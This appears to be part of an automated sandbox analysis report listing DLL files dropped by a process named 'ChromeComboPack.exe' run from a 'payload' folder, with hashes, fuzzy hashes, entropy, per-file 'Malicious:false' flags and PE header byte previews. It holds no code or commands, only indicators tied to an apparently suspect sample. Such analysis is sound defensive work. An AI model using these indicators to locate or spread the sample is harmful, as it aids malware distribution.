                                                                                                                                                                                                                                            MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                                                                                                                            SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                                                                                                                            SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                                                                                                                            SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.799063285091512
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                                                                                                                            MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                                                                                                                            SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                                                                                                                            SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                                                                                                                            SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):754688
                                                                                                                                                                                                                                            Entropy (8bit):7.624959985050181
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                                                                                                                            MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                                                                                                                            SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                                                                                                                            SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                                                                                                                            SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):27648
                                                                                                                                                                                                                                            Entropy (8bit):5.792654050660321
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                                                                                                                            MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                                                                                                                            SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                                                                                                                            SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                                                                                                                            SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):67072
                                                                                                                                                                                                                                            Entropy (8bit):6.060461288575063
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                                                                                                                            MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                                                                                                                            SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
                                                                                                                                                                                                                                            SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                                                                                                                            SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                                                            Entropy (8bit):4.488437566846231
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                                                                                                                            MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                                                                                                                            SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                                                                                                                            SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                                                                                                                            SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.730605326965181
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                                                            MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                                                            SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                                                            SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                                                            SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.685843290341897
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                                                            MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                                                            SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                                                            SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                                                            SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):119192
                                                                                                                                                                                                                                            Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                            MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                            SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                            SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                            SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49528
                                                                                                                                                                                                                                            Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                            MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                            SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                            SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                            SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):71448
                                                                                                                                                                                                                                            Entropy (8bit):6.263206909105092
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BoxWhy9EQkTpR1Pg9qgTILN/86wW1lI1Onl7SyPxN3:BiWhy3k1Ra9qgTILN/Lw8lI1OnlB
                                                                                                                                                                                                                                            MD5:CC0F232F2A8A359DEE29A573667E6D77
                                                                                                                                                                                                                                            SHA1:D3FFBF5606D9C77A0DE0B7456F7A5314F420B1F7
                                                                                                                                                                                                                                            SHA-256:7A5C88CE496BAFDF31A94AE6D70B017070703BC0A7DA1DFAE7C12B21BB61030D
                                                                                                                                                                                                                                            SHA-512:48484177BF55179607D66F5A5837A35CD586E8A9FB185DE8B10865AAB650B056A61D1DC96370C5EFC6955CCB4E34B31810F8E1C8F5F02D268F565A73B4FF5657
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7_[.V1..V1..V1......V1.5.0..V1.5.2..V1.5.5..V1.5.4..V1...0..V1...0..V1..V0.qV1...<..V1...1..V1......V1...3..V1.Rich.V1.........................PE..d.....f.........." ...(.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...]e.......f.................. ..`.rdata..pO.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):85272
                                                                                                                                                                                                                                            Entropy (8bit):6.591457260071925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+yhz79151BVo1vXfzIFnaR4bO1AsCn8Bsjk+tI1CVQ7Sy4x+R:Nhzx15evXkuxAB8BMk+tI1CVQF
                                                                                                                                                                                                                                            MD5:DD26ED92888DE9C57660A7AD631BB916
                                                                                                                                                                                                                                            SHA1:77D479D44D9E04F0A1355569332233459B69A154
                                                                                                                                                                                                                                            SHA-256:324268786921EC940CBD4B5E2F71DAFD08E578A12E373A715658527E5B211697
                                                                                                                                                                                                                                            SHA-512:D693367565005C1B87823E781DC5925146512182C8D8A3A2201E712C88DF1C0E66E65ECAEC9AF22037F0A8F8B3FB3F511EA47CFD5774651D71673FAB612D2897
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(.....^...............................................`............`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text...#........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179712
                                                                                                                                                                                                                                            Entropy (8bit):6.1811062167186535
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:wUGWBBiI+9IWlmWuMkLlSgWn/lm0criDgS70kSTLkKwlgel:wStMIWANSgC2icNkSTLLwWe
                                                                                                                                                                                                                                            MD5:D8CAF1C098DB12B2EBA8EDAE51F31C10
                                                                                                                                                                                                                                            SHA1:E533AC6C614D95C09082AE951B3B685DACA29A8F
                                                                                                                                                                                                                                            SHA-256:364208A97336F577D99BBAAED6D2CF8A4A24D6693B323DE4665F75A964CA041D
                                                                                                                                                                                                                                            SHA-512:77E36F4FB44374B7C58A9005A1D7DFEB3214EABB90786E8A7C6593B5B1C7A305D6AA446BE7A06AE0FF38F2BEDEA68CACB39053B7B7EC297BFF3571B3922FD938
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........L.#.-.p.-.p.-.p.U.p.-.p,..q.-.p,..p.-.p,..q.-.p,..q.-.p,..q.-.p.U.q.-.p...q.-.p.-.p.-.p...q.-.p.U.p.-.p...q.-.p..}p.-.p...q.-.pRich.-.p........................PE..d....}.f.........." ...(.....B..............................................0............`.........................................`h..l....h............................... .......O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...p..............@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):125208
                                                                                                                                                                                                                                            Entropy (8bit):6.138116508461042
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:cXw32spTVYgFoj6N2xE9sb7VRf/EiZBq5syCtYPU9BI1LP885:cgGEOgFoj68ksrf/Ejsa5
                                                                                                                                                                                                                                            MD5:C8AFA1EBB28828E1115C110313D2A810
                                                                                                                                                                                                                                            SHA1:1D0D28799A5DBE313B6F4DDFDB7986D2902FA97A
                                                                                                                                                                                                                                            SHA-256:8978972CF341CCD0EDF8435D63909A739DF7EF29EC7DD57ED5CAB64B342891F0
                                                                                                                                                                                                                                            SHA-512:4D9F41BD23B62600D1EB097D1578BA656B5E13FD2F31EF74202AA511111969BB8CFC2A8E903DE73BD6E63FADAA59B078714885B8C5B8ECC5C4128FF9D06C1E56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(............`_..............................................|.....`.........................................p`.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..hl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257304
                                                                                                                                                                                                                                            Entropy (8bit):6.565090204799859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:3uQjqbJrTwvqM+eYx+lDJOAkl9qWM53pLW1AcfRRR6tlISgOg:3sTwvWeS+xJw4ln7g
                                                                                                                                                                                                                                            MD5:CEA3B419C7CA87140A157629C6DBD299
                                                                                                                                                                                                                                            SHA1:7DBFF775235B1937B150AE70302B3208833DC9BE
                                                                                                                                                                                                                                            SHA-256:95B9850E6FB335B235589DD1348E007507C6B28E332C9ABB111F2A0035C358E5
                                                                                                                                                                                                                                            SHA-512:6E3A6781C0F05BB5182073CCA1E69B6DF55F05FF7CDCEA394BACF50F88605E2241B7387F1D8BA9F40A96832D04F55EDB80003F0CF1E537A26F99408EE9312F5B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.....<............................................................`..........................................c..P....c...................&......./......T.......T...........................p...@............................................text...9........................... ..`.rdata..(...........................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66328
                                                                                                                                                                                                                                            Entropy (8bit):6.227566291152438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:/9gLpgE4Z27ARZWZnEmoAlI1OIH7SyT0xq:26RZeEmoAlI1OIHth
                                                                                                                                                                                                                                            MD5:D19CB5CA144AE1FD29B6395B0225CF40
                                                                                                                                                                                                                                            SHA1:5B9EC6E656261CE179DFCFD5C6A3CFE07C2DFEB4
                                                                                                                                                                                                                                            SHA-256:F95EC2562A3C70FB1A6E44D72F4223CE3C7A0F0038159D09DCE629F59591D5AA
                                                                                                                                                                                                                                            SHA-512:9AC3A8A4DBDB09BE3760E7CCB11269F82A47B24C03D10D289BCDDED9A43E57D3CD656F8D060D66B810382ECAC3A62F101F83EA626B58CD0B5A3CCA25B67B1519
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.V.......... @............................................../.....`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):160024
                                                                                                                                                                                                                                            Entropy (8bit):6.85368707809341
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:lsvkxujgo7e2uONOG+hi+C8znfF9mNooXnmbutI1Z1mb:lnu0o7JUrNYOo2Kz
                                                                                                                                                                                                                                            MD5:8CFBAFE65D6E38DDE8E2E8006B66BB3E
                                                                                                                                                                                                                                            SHA1:CB63ADDD102E47C777D55753C00C29C547E2243C
                                                                                                                                                                                                                                            SHA-256:6D548DB0AB73291F82CF0F4CA9EC0C81460185319C8965E829FAEACAE19444FF
                                                                                                                                                                                                                                            SHA-512:FA021615D5C080AADCD5B84FD221900054EB763A7AF8638F70CF6CD49BD92773074F1AC6884F3CE1D8A15D59439F554381377FAEE4842ED5BEB13FF3E1B510F4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(.f..........`8....................................................`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35608
                                                                                                                                                                                                                                            Entropy (8bit):6.432025225087344
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:a1Rp7eiajKCWnAxQ0zduVI1Wt95YiSyvAAMxkE3:mRteiaoAxQ0zIVI1Wtj7SyGxr
                                                                                                                                                                                                                                            MD5:EB859FC7F54CBA118A321440AD088096
                                                                                                                                                                                                                                            SHA1:9D3C410240F4C5269E07FFBDE43D6F5E7CC30B44
                                                                                                                                                                                                                                            SHA-256:14BDD15D60B9D6141009AEEDC606007C42B46C779A523D21758E57CF126DC2A4
                                                                                                                                                                                                                                            SHA-512:694A9C1CC3DC78B47FAEDF66248FF078E5090CFAB22E95C123FB99B10192A5748748A5F0937FFD9FD8E1873AD48F290BE723FE194B7EB2A731ADD7F5FB776C4A
                                                                                                                                                                                                                                            Malicious:false
